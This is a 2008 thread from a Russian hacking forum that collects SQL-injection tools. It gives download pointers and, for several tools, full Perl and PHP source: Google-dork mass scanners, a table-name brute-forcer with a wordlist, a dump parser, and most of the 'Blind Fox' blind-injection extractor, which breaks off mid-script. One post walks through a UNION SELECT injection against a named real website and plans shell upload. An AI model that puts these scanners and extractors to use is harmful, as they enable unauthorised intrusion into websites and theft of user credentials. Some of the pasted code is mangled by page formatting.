1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Софт для работы с SQL-injection

Тема в разделе "Сканеры|:|Брут", создана пользователем ~!Dok_tOR!~, 16 сен 2008.

  1. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    Для тех кто не знает зачем это нужно: Данные программы значительно облегчают поиск sql-injection

    Скрипт для подбора числа столбцов в БД.

    Основная функция:

    -подбор числа столбцов в БД.
    Эта утилита написана на языке Perl

    Antichat SQL-tools for check columns v.1.1.1

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    Antichat SQL-tools for one_simvol_brut_columns v.1.1.1

    Скрипт для посимвольного перебора записей в БД.

    Основная функция:
    - посимвольный подбор целевого значения записи в БД
    Данный скрипт также написан на перле

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    Antichat Databases_Dumper_MSSQL(MySQL-5.*) v.1.1.1

    Скрипт для дампинга базы mssql, mysql-5.*

    Основная функция:
    - автоматический частичный\полный дампинг БД (mssql, mysql-5.*)

    крипт предназначен для автоматического дампа БД, используя sql-инъекцию в запросе на основе системных таблиц " INFORMATION_SCHEMA".
    Поддерживаются MSSQL и MySQL.v.5.*.

    Когда мы встречаемся с sql-inj в MSSQL приходится искать нужные нам столбцы и таблицы, строить запрос. Хуже, если нужно сдампить всю базу, или просмотреть структуру, а результат каждого запроса - только ОДНА запись. Это самый тяжёлый и нудный случай, и скрипт сущесственно облегчает рутиную работу.

    - ВНИМАНИЕ! Включение автодампа и произвольного запроса недопустимо!

    - всего предусмотрено три алгоритма автодампа: только скелет таблиц, скелет таблиц и столбцов, полный дамп(данные).

    - есть возможность задать произвольный запрос(-Z 1).
    (внимание: -Z либо не задан, либо равен 1)
    При произвольном запросе производится полный дамп данных. Если столбец не указан - дампится вся указанная таблица.
    Условие WHERE при неуказанном столбце выполняет поиск желаемых столбцов. При указанном столбце WHERE производит поиск желаемых данных.

    - вы можете при необходимости задать лимит, выбрать желаемый метод отрицания, указать тип шифрования.

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**


    SQL Helper 1.0

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    SQL & XSS error finder

    Программа поможет вам в построении XSS уязвимости или SQL инъекции.

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**


    MIM v0.2 MySQL injection Master

    консольный помощник со SQL. Исходный код на на python. Автор: xN.

    Возможности версии 0.2:

    Подбирает кол-во колонок .
    Узнает какие из них отображаются .
    Выводит USER(),DATABSE(),VERSION() .
    Выводит список таблиц .
    Mysql char().
    Считавание файла с сервера с помощью load_file().
    Слитие листов (user;pass)

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**


    Microsoft SQL Database Extractor

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**


    Добавлено через 1 минуту
    давайте сбда постить проги по sql потом искать удобнее будет имхо всё в одном месте или тему кидайте )
     
    Последнее редактирование: 16 сен 2008
    16 сен 2008
  2. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    Круто. Щас перенесу в эту тему все, что выкладывал по этой теме.
    ~!Dok_tOR!~, А можешь все эти архивы в один собрать? Было бы супер. =))
    ЗЫ Тему закрепить?

    Добавлено через 15 минут
    SQL Injection Tool 4 beta.

    [​IMG]


    Сразу скажу что появилось одно изменение, место куда будут вставляться запросы отмечается {SQLINJ}, то есть если уязвим параметр getid, то в урл пишем

    Код:
    Код:
    http://localhost/test.php?getid=1{SQLINJ}
    а если это текстовый параметр то урл будет такой
    Код:
    Код:
    http://localhost/test.php?getid=1'{SQLINJ}
    ну всё остальное похоже, сообственно кто захочет разберётся.

    Скачать:
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 1 or greater.**
    (c) SQLHack


    BSQL (Blind SQL) Hacker​

    [​IMG]
    Код:
    BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.
    BSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).
    It allows metasploit alike exploit repository to share and update exploits.
    Key Features
    Easy Mode
    SQL Injection Wizard
    Automated Attack Support (database dump)
    ORACLE
    MSSQL
    MySQL (experimental)
    General
    Fast and Multithreaded
    4 Different SQL Injection Support
    Blind SQL Injection
    Time Based Blind SQL Injection
    Deep Blind (based on advanced time delays) SQL Injection
    Error Based SQL Injection
    Can automate most of the new SQL Injection methods those relies on Blind SQL Injection
    RegEx Signature support
    Console and GUI Support
    Load / Save Support
    Token / Nonce / ViewState etc. Support
    Session Sharing Support
    Advanced Configuration Support
    Automated Attack mode, Automatically extract all database schema and data mode
    Update / Exploit Repository Features
    Metasploit alike but exploit repository support
    Allows to save and share SQL Injection exploits
    Supports auto-update
    Custom GUI support for exploits (cookie input, URL input etc.)
    GUI Features
    Load and Save
    Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be show to the user in a GUI)
    Visually view true and false responses as well as full HTML response, including time and stats
    Connection Related
    Proxy Support (Authenticated Proxy Support)
    NTLM, Basic Auth Support, use default credentials of current user/application
    SSL (also invalid certificates) Support
    Custom Header Support
    Injection Points (only one of them or combination)
    Query String
    Post
    HTTP Headers
    Cookies
    Other
    Post Injection data can be stored in a separated file
    XML Output (not stable)
    CSRF protection support
    one time session tokens or asp.net viewstate ort similar can be used for separated login sessions, bypassing proxy pages etc.
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    Скрипт поиска SQL уязвимостей
    Данный скрипт использует пхп и гугль.
    Вот сам скрипт:
    Код:
    <?php
    set_time_limit(0);
    function google($domen){
    $file=file_get_contents("http://www.google.ru/ie?q=site%3A$domen&hl=ru&newwindow=1&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&num=100");
    //$file=file_get_contents("http://www.google.ru/ie?q=".urlencode(trim($text))."&hl=ru&lr=&newwindow=1&btnI=I%27m+Feeling+Lucky&num=10000");
    $result = array ();
    $ex = array ();
    $regexp = '[0-9]. <a title="(.*)" href=(.*)>(.*)<\/a>';
    
    if (preg_match_all("/$regexp/siU", $file, $matches)) {
    foreach($matches[2] as $item) { 
    array_push($result,$item);
    }
    
    if (is_integer(strpos($file,"&start="))) { // От 0 до 100
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=100&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 100 до 200
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=200&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 200 до 300
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=300&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 300 до 400
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=400&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 400 до 500
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=500&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 500 до 600
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=600&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 600 до 700
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=700&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 700 до 800
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=800&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 800 до 900
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=900&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    if (is_integer(strpos($file,"&start="))) { // От 800 до 900
    $file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=1000&hl=ru&start=100&sa=N");
    if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
    
    for ($i = 0; $i <= count($result)-1; $i++) {
    if (is_integer(strpos($result[$i],"="))) {
    $s=$result[$i];
    $s=str_replace("&","'&",$s);
    $s = $s."'";
    $rx=file_get_contents($s);
    if (is_integer(strpos($rx,"SQL syntax"))){
    flush();
    echo "<span class=\"red\">$s</span><br>";}
    }}
    
    if(count($ex)==0)
    array_push($ex,"<center><b>Not found</b></center>");
    
    return $ex;
    } else return "<center><b>Not found</b></center>";
    }
    ?>
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <title>SQL Inj Tester - Coded by ArxWolf, Powered by WebXakep.net - Russian</title>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <meta name="author" content="ArxWolf">
    <style>
    .red:link   { color: red; font-weight: bold; text-decoration: none;}
    .red:visited   { color: red; font-weight: bold; text-decoration: none;}
    .red:hover   { color: red; font-weight: bold; text-decoration: underline;}
    .red:active   { color: red; font-weight: bold; text-decoration: none;}
    body {
    background-color: #1B1B1B;
    font: normal 10px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
    color: #83AACB;
    font-weight: bold;
    }
    input,textarea,select
    {font: normal 11px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
    color: #B4B4B4;
    background-color: #333333;
    border-color: #424242;
    border-left: 1px solid #0A0A0A;
    border-top: 1px solid #0A0A0A;
    border-right: 1px solid #2C2C2C;
    border-bottom: 1px solid #2C2C2C;}
    input:hover, textarea:hover, select:hover  {
    border-color: #B6FF48;
    color: #B6FF48;}
    input:focus, textarea:focus, select:hover {
    border-color: #B6FF48;
    color: #ffffff;}
    .td {
       border: 1px solid #666666;
    }
    </style>
    </head>
    <body>
    <form method="post">
    <table width="200"  border="0" align="center" class="td">
      <tr>
        <td nowrap>Host [Scanning a maximum of 1000 pages]:</td>
        <td><input type="text" name="tt" size="30"></td>
      </tr>
      <tr>
        <td colspan="2"><div align="right">
          <input type="submit" name="sbm" value="Run">
        </div></td>
      </tr>
    </table>
    </form>
    
    <?php
    if (isset($_POST['sbm'])){
    $txt=$_POST['tt'];
    if ($txt=="") die("<center><b>Empty</b></center>");
    $res=google($txt);
    
    }
    ?>
    
    </body>
    </html>
    ЗЫ. У меня почему-то не работает. Вообще вещь очень полезная.

    Bako's SQL Injection Scanner.
    [​IMG]
    азвание говорит само за себя.
    Очередной автоматизатор скуль-инъекций.
    Автор - Bako
    Примечание автора: (в переводе)

    На функциональность пока не тестил, но вирья и троев в ней нет.
    Авира ругается на SQL-Inject программу.
    Пользуем на свой страх и риск
    Скачать:
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    SQL "vuln" finder
    Made by dEmOn.
    Скрипт находит уязвимые для инъекций страницы.
    Главное заполнить файл dorks.txt
    Код:
    #!/usr/bin/perl
    #ohnoez
    use LWP::Useragent;
    use IO::Socket;
    use HTTP::Request;
    $xsc = "dorks.txt";
    $ua = LWP::UserAgent->new;
    $ua->agent("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"); 
    
    
    open(FILEZ, $xsc) or die("wtf??Can't open it!\n");
    my @dorks = <FILEZ>;
    close(FILEZ);
    
    foreach $dork (@dorks) {
    	$dork =~ s/^\s+//;
    	$dork =~ s/\s+$//;
    	print "Dork: $dork\r\n";
    	print "Please wait.. GOOGLING..\r\n";
    	for ($i = 0; $i < 700; $i = $i + 10) {
    		$ax = HTTP::Request->new(GET => "http://www.google.com/custom?q=$dork&hl=en&client=pub-8993703457585266&channel=5474133811&cof=FORID:1%3BAH:left%3BS:http://www.blackle.com/%3BCX:Blackle%3BL:http://www.blackle.com/logo.jpg%3BLH:100%3BLP:1%3BBGC:%23000000%3BT:%23999999%3BLC:%23cccccc%3BVLC:%23667766%3BGALT:%23666666%3BGFNT:%23666666%3BGIMP:%23666666%3B&cx=013269018370076798483:gg7jrrhpsy4&adkw=AELymgVSl8RKnkUIFW-Qf0Z7tVGQ1HF2Dq2_jfnr9PhgYEkO0YkU6T2QvRIvjsqcpfvFPZsy_2dnqNIFnM2gBX7Ayoz1Btg2seSE01xKNoyysRmm3iC-Bp0&start=$i&sa=N");
    		$response = $ua->request($ax);
    		if ($response->is_success) {
    			$source = $response->content;
    			while ($source =~ m/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/g) {
    				$target = (split('=', $2))[0] . "='";
    				push(@targets, $target);
    			}
    		}
    	}
    	my %seen = ();
    	@targets = grep { ! $seen{ $_ }++ } @targets;
    	$n = @targets;
    	print "[+]FOUND $n sites..\r\n\n";
    	print "Please wait.. EXPLOITING..\r\n";
    	foreach $tar (@targets) {
    		$tar =~ s/^\s+//;
    		$tar =~ s/\s+$//;
    		$axz = HTTP::Request->new(GET => $tar);
    		$responsez = $ua->request($axz);
    
    		if ($responsez->is_success) {
    			$sourcez = $responsez->content;
    			if (($sourcez =~ m/Database Error/gi) or ($sourcez =~ m/You have an error in your SQL syntax/gi)) {
    				print "VULN: $tar\r\n";
    				open(FILE, ">>valid.txt");
    				print FILE "$3:$1\n";
    				close(FILE);
    			}
    		}	
    	}
    
    }
    print "FINISHED [=]\r\n";
    $fin = <>;
    Скрипт ищет имена таблиц при скуль-инъекции.
    Made by dEmOn
    Код:
    #!/usr/bin/perl
    #coded by dEmOn
    
    #NOTE: U must have the 2 txt files present.. urls.txt and wordlist.txt
    #its self-explanatory ;)
    
    #input the url in urls.txt like this:
    # http://www.marlies-schild-fanclub.com/galerie3/galerie_image_page.php?pid=-1 union all select 1 from
    
    use LWP::UserAgent;
    $xsc = "urls.txt\n";
    $source = "wordlist.txt\n";
    my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
    open(FILE, $source) or die("wtf??Can't open it!\n");
    my @tables = <FILE>;
    close(FILE);
    
    open(FILEZ, $xsc) or die("wtf??Can't open it!\n");
    my @urls = <FILEZ>;
    close(FILEZ);
    
    foreach $url (@urls) {
    	$url =~ s/^\s+//;
    	$url =~ s/\s+$//;
    
    	print "TARGET - $url\n\n\n";
    	foreach $table (@tables) {
    		$table =~ s/^\s+//;
    		$table =~ s/\s+$//;
    		print "TRYING $table - ";
    		my $response = $ua->get($url . ' ' . $table .'--');
    		if ($response->is_success) {
    			if ($response->content =~ m/The used SELECT statements have a different number of columns/gi) {
    				print "\tOK\n\n";
    				last;
    			} else {
    				print "\tFAILED\n";
    				next;
    			}
     
    		}
    		else {
    		print "FAIL - $response->status_line\n\n";
    		}
    	}
    }
    print "\n\n\n[[DONE]]\n";
    $x = <>;
    Список имен.
    Код:
    shop
    user
    bruker
    brukere
    admin
    admins
    webuser
    webusers
    webadmin
    webadmins
    webmaster
    member
    members
    memberlist
    tbluser
    tbl_user
    tbl_users
    a_admin
    x_admin
    m_admin
    adminuser
    admin_user
    adm
    userinfo
    user_info
    admin_userinfo
    userlist
    user_list
    access_users
    korisnik
    korisnici
    administrator
    administratori
    clan
    clanovi
    admini
    osoblje
    customer
    customers
    admin
    news
    users
    SQL Power Injector 1.2

    [​IMG]


    Скачать можно здесь:
    http://www.sqlpowerinjector.com/download.htm

    My SQL Helper for MYsql injections
    video included
    i got nothin to do at work so been coding this for fun.
    still working on rs/email and webcrawler.
    it may or may not work.
    can brute mysql 4.
    Может потребовать Framework для работы.
    Скачать прогу (142 кб)
    Скачать видео (4.6 мб)
    пасс: reiluke
    [​IMG]
     
    Последнее редактирование: 16 сен 2008
    16 сен 2008
    1 человеку нравится это.
  3. seven
    seven Продвинутый
    Симпатии:
    17
    21 сен 2008
    1 человеку нравится это.
  4. DJ.KilleR
    DJ.KilleR А я томат Новичок
    Симпатии:
    134
    SQLInjectHelper

    На одном из сайтов обнаружил инъекцию. Стал вычислять количество полей в таблице. Их оказалось 86 :confused: :eek: . Набирать столько полей в строке адреса, а потом ещё и как-то работать с ними жутко неудобно. Решил я это дело автоматизировать. В процессе такой автоматизации и родилась программма SQLInjectHelper.
    Пока что это бета версия и многого задуманного программа пока не делает. Почему выкладываю недоделанную версию, спросите вы? Ответ: Не хочу делать много, потому что потом скорее всего придется переделывать все под Ваши желания (возможно менять архитектуру построения программы). Хочу, чтобы вы высказали свои пожелания по возможным дополнениям, покритиковали и.. в общем все как полагается к новой программе.
    Итак, скрин:

    [​IMG]

    В первом поле ввода предлагается ввести уязвимый урл.
    Чтобы нам всем было проще, будем рассматривать все на практическом примере: http://englishspectrum.net/
    Перед использованием программы от вас потребуется узнать количество колонок в запросе. Для нашего примера их 86 ))).
    Итак. Наш уязвимый урл:
    http://englishspectrum.net/jobkorea/findpeople.html?include=form&mode=view&id=-99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*&lc=&sc=&mc=&pp=&gid=1&&&search_YN=Y
    Далее, мы должны выбрать какую-либо видимую колонку, в которой будут отображаться результаты запроса. В моем случае я выбрал 52. Для этой колнки мы должны составить регулярное выражение, по которому наша программа сможет выделить её из основного html. В моем случае это было f'>(.*?)\s-\s53
    Место, где должна быть инъекция, заменяем на {INJECT}.
    http://englishspectrum.net/jobkorea/findpeople.html?include=form&mode=view&id=-99 {INJECT}&lc=&sc=&mc=&pp=&gid=1&search_YN=Y
    Вводим полученный урл в первое поле ввода.
    Во второе поле ввода вводим наше регулярное выражение. Далее вводим количество колонок в запросе и номер отображаемой колонки. Внутрь неё мы будем складывать результаты запросов. Все что нам остается нажать кнопку Start и ждать результатов!

    Текущие возможности (бета версия, только базовый набор, очень базовый :) ):
    Получение версии MySQL
    Получение имени текущей БД и юзера
    Получение списка всех таблиц (для MySQL >= 5)
    Работа через прокси (пока хз когда сделаю)
    В планах:
    Список колонок для таблицы (будет скорее всего отдельной формой)
    Определение привилегий юзера
    Заливка шела
    Ничего слушать про то, что такое уже есть не хочу! Не хочу потому что:
    1. это только начало, программа ещё сильно обрастет
    2. Автоматизация никогда не вредна.
    3. Смотри первые 2 пункта.

    Программа написана на C#, поэтому нужен 2й фреймворк.

    © groupby

    Скачать | Download: ~ 38 Кб

    DepositFiles
    RapidShare
    WebFile
    Ifolder
    Dump
    Slil
     
    23 сен 2008
    1 человеку нравится это.
  5. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    sqlmap-0.6.1 новая версия sqlmap для слепых инъекций.

    _http://packetstormsecurity.org/UNIX/audit/sqlmap-0.6.1.tar.gz
     
    24 окт 2008
    1 человеку нравится это.
  6. seven
    seven Продвинутый
    Симпатии:
    17
  7. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    SQL Injection Tool v2.1a
    [​IMG]
    Скачать

    DB Extractor [Perl]
    PHP:
    #!/usr/bin/perl
    use strict;
    my($db_database,$db_prefix,$db_rowumbers,$db_splitter,$db_resultfile,$line,$realnum,$list,$dumplist,$x,@db_rowumbers,@fulldb,@rowdata);
    sub usage{
       print 
    "USAGE: <database>\tdb dump
       <prefix>\tPrefix of the table you're dumping
       <rows>\tNumbers pointing to the data you want, seperate by commas
       <delimiter>\tWhat to split the resulting data by.
       \t\tIf you want spaces then enclose with quotes
       <resultfile>\tFile to dump the data to\n"
    ;
       print 
    "EX: dump_gamers.sql e107_users 2,5 : gamerdump.txt\n";
       exit;
    }


    &
    usage unless @ARGV==5;
    $db_database=$ARGV[0];
    $db_prefix=$ARGV[1];
    $db_rowumbers=$ARGV[2];
    $db_splitter=$ARGV[3];
    $db_resultfile =$ARGV[4];
    @
    db_rowumbers split(/,/,$db_rowumbers);
    open(xfile"<$db_database") || die "Couldn't open $list\n";
    @
    fulldb = <xfile>;
    close(xfile);
    chomp(@fulldb);

    foreach 
    $line(@fulldb){
       if((
    $line =~ m/INSERT INTO \'$db_prefix\'\((.*?)\)/i) || ($line =~ m/INSERT INTO \`$db_prefix\`\((.*?)\)/i)  || ($line =~ m/^INSERT INTO $db_prefix(.*?)\((.*?)\)/i)){
             $line =~ s/INSERT INTO \'$db_prefix\'/INSERT INTO \`$db_prefix\`/;
          @rowdata = split(/\'/,$line);
          open(DBLOG,">>$db_resultfile") || die "Couldn'
    t open uname-$dumplist\n";
          print "
    [+] ";
          for(
    $x=0;$x<=$#db_rowumbers;$x++){
             
    $realnum = $db_rowumbers[$x]*2-1;
             if(
    $x==$#db_rowumbers){
                print "
    $rowdata[$realnum]\n";
                print DBLOG "
    $rowdata[$realnum]\n";
             }
             else{
                print "
    $rowdata[$realnum]$db_splitter";
                print DBLOG "
    $rowdata[$realnum]$db_splitter";
             }
          }
       }
    }
          close(DBLOG);
          print "
    [+] Parsing dumping completed\n";
    The Blind Fox v0.5 | By Login-Root [Blind SQL Tool]
    PHP:
    #!/usr/bin/perl

    ###########################################################################################
    #                           -[+]- The Blind Fox v0.5 | By Login-Root -[+]-              ###
    ###########################################################################################

    ###########################################################################################
    # [+] inf0:                                                                             ###
    ###########################################################################################
    # It Searchs:                                                                           ###
    # ===========                                                                           ###
    #  - Check AND 1=1 && AND 1=0                                                           ###       
    #  - Information_Schema && MySQL.User                                                   ###
    #  - Tables                                                                             ###                                               
    #  - Columns                                                                            ###
    #  - Extract values from tables (Optional)                                              ###
    #                                                                                       ###
    #  ...and save it on a nice text file.                                                  ###
    #                                                                                       ###
    ###########################################################################################

    ###########################################################################################
    # [+] Use:                                                                              ###
    ###########################################################################################
    # perl blindfox.pl [WEBSITE] [PATTERN] [FILE] [-EXT]                                    ###
    #   [WEBSITE]: http://www.web.com/index.php?id=4875 (Use a valid number)                ###
    #   [PATTERN]: Pattern that exists with AND 1=1, and that does not exist with AND 1=0   ###
    #   [FILE]:    File where save the results                                              ###
    #   [-EXT]:    To extract user names, passwords, etc. (Optional)                        ###
    ###########################################################################################

    ###########################################################################################
    # [+] c0ntact:                                                                          ###
    ###########################################################################################
    # MSN:    no.more@passport.com                                                          ###
    # Jabber: login-root@x23.eu                                                             ###
    # E-Mail: login_root@yahoo.com.ar                                                       ###
    ###########################################################################################

    ###########################################################################################
    # [+] sh0utz:                                                                           ###
    ###########################################################################################
    # In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
    # Many thanks to boER, who teach me a little of perl ;D                                 ###
    # VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                    ###
    ###########################################################################################

    ###########################################################################################
    # ARGENTINA PRODUCT :)                                                                  ###
    ###########################################################################################

    use LWP::Simple;

    if(!
    $ARGV[2])
       {
           print 
    "\n\n-[+]- The Blind Fox v0.5 | By Login-Root -[+]-\n==============================================";
           print 
    "\n\nUse: perl $0 [WEBSITE] [PATTERN] [FILE] [-EXT]\n";
           print 
    "\n[WEBSITE]: http://www.web.com/index.php?id=4875 (Use a valid number)\n[PATTERN]: Pattern that exists with AND 1=1, and that does not exist with AND 1=0\n[FILE]:    File where save the results\n[-EXT]:    To extract user names, passwords, etc. (Optional)\n\n";
           exit (
    0);
       }
       
    sub end()
    {
       print 
    WEB "\n\n\n[*EOF*]";
        print 
    "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
        print 
    "## c0ded by Login-Root | 2008 ##\n\n";
        exit (
    0); 
    }   

       
    @
    nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
         
    'name','names','nombre','nombres','member','members','admin_table',
         
    'miembro','miembros','membername','admins','administrator','sign',
         
    'administrators','passwd','password','passwords','pass','Pass',
         
    'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
         
    'member_password','mods','mod','moderators','moderator','user_email',
         
    'user_emails','user_mail','user_mails','mail','emails','email','address',
         
    'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
         
    'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
         
    'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
         
    'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
         
    'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin',
         
    'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
          
    'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
          
    'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
          
    'associated','accnt','customers','customer','membres','administrateur','utilisateur',
          
    'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
          
    'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
         
    'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

    @
    nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
              
    'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
              
    'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
              
    'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
              
    'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
              
    'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

    if ( 
    $ARGV[0]   !~   /^http:/ )
      {
          
    $ARGV[0] = "http://" $ARGV[0];
      }

    open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
    print 
    WEB "[WEBSITE]:\n\n$ARGV[0]\n";
    print 
    "\n[!] Checking for the pattern...\n";
          
    $sql=$ARGV[0]." AND 1=1";
          
    $response=get($sql);
          if(
    $response =~ /$ARGV[1]/)
            {
                print 
    "\n[+] Pattern found with AND 1=1\n";
                print 
    WEB "$sql => OK !\n";
                
    $sql=$ARGV[0]." AND 1=0";
                
    $response=get($sql);
                if(
    $response =~ /$ARGV[1]/)
                {
                   print 
    "[-] Pattern found with AND 1=0 too, website possible to not be vulnerable, try with another pattern\n";
                   exit (
    0);
                }
                else
                {
                   print 
    "[+] Pattern not found with AND 1=0, website vulnerable to Blind SQL Inyection\n";
                   print 
    WEB "$sql => OK !\n";
                }
             }
             else
                   {
                      print 
    "[-] Pattern not found, try with another\n";
                      exit (
    0);
                   }
            print 
    "\n[!] Checking if Information_Schema exists...";
            
    $sql=$ARGV[0]." AND (SELECT Count(*) FROM information_schema.tables)";
            
    $response=get($sql);
             if(
    $response =~ /$ARGV[1]/)
                {
                   print 
    "\n[+] Information_Schema available...saving in $ARGV[2]";
                    print 
    WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
                   
                }
             else
                {
                   print 
    "\n[-] Information_Schema unavailable";
                }
            print 
    "\n[!] Checking if MySQL.User exists...";
            
    $sql=$ARGV[0]." AND (SELECT Count(*) FROM mysql.user)";
            
    $response=get($sql);
             if(
    $response =~ /$ARGV[1]/)
                {
                   print 
    "\n[+] MySQL.User available...saving in $ARGV[2]";
                    print 
    WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
                   
                }
             else
                {
                   print 
    "\n[-] MySQL.User unavailable";
                }
            print 
    "\n\n[!] Bruteforcing tables...";
            print 
    WEB "\n\n[TABLES]:\n\n";
            foreach 
    $tabla(@nombretabla)
             {
                      
    chomp($tabla);
                      
    $sql=$ARGV[0]." AND (SELECT Count(*) FROM ".$tabla.")";
                      
    $response=get($sql);
                      if(
    $response =~ /$ARGV[1]/)
                        {
                            print 
    "\n[+] Table $tabla exists...saving in $ARGV[2]";
                            print 
    WEB "$sql\n";
                        }
                    }
            print 
    "\n\n[!] Table to brute force columns: ";
                
    $tabla.=<STDIN>;
                
    chomp($tabla);
                print 
    WEB "\n\n[COLUMNS IN $tabla]:\n\n";
                foreach 
    $columna(@nombrecolumna)
                {
                 
    chomp($columna);
                 
    $sql=$ARGV[0]." AND (SELECT Count(".$columna.") FROM ".$tabla.")";
                 
    $response=get($sql);
                 if (
    $response =~ /$ARGV[1]/)
                      {
                          print 
    "\n[+] Column $columna available...saving in $ARGV[2]";
                          print 
    WEB "$sql\n";
                      }
                }
             if (
    $ARGV[3] =~ /-EXT/)
             {
                
    extrac:
                
    $columna '';
                print 
    "\n\n[!] Column of table $tabla to extract values: ";
                
    $columna.=<STDIN>;
                
